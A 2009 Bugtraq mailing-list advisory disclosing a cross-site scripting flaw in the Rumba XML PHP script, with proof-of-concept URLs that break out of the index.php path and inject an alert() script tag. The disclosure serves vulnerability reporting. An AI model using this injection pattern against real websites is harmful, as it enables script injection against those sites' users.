[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Rumba XML XSS vulnerability

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Rumba XML XSS vulnerability
From: hadikiamarsi@xxxxxxxxxxx
Date: 17 Dec 2009 12:02:16 -0000

###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : 
http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/600056463/webscripts/PHP/xml18eng.zip
#

###########################################

PoC :

http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>

example :

http://www.example.com/index.php/>"><script>alert('Hadi Kiamarsi')</script>

local Example :

http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>

Prev by Date: [Suspected Spam][oCERT-2009-019] Ganeti path sanitization errors
Next by Date: Campus Party Eu 2010 Security Challenge - Call For Participants
Previous by thread: [Suspected Spam][oCERT-2009-019] Ganeti path sanitization errors
Next by thread: Campus Party Eu 2010 Security Challenge - Call For Participants
Index(es):
- Date
- Thread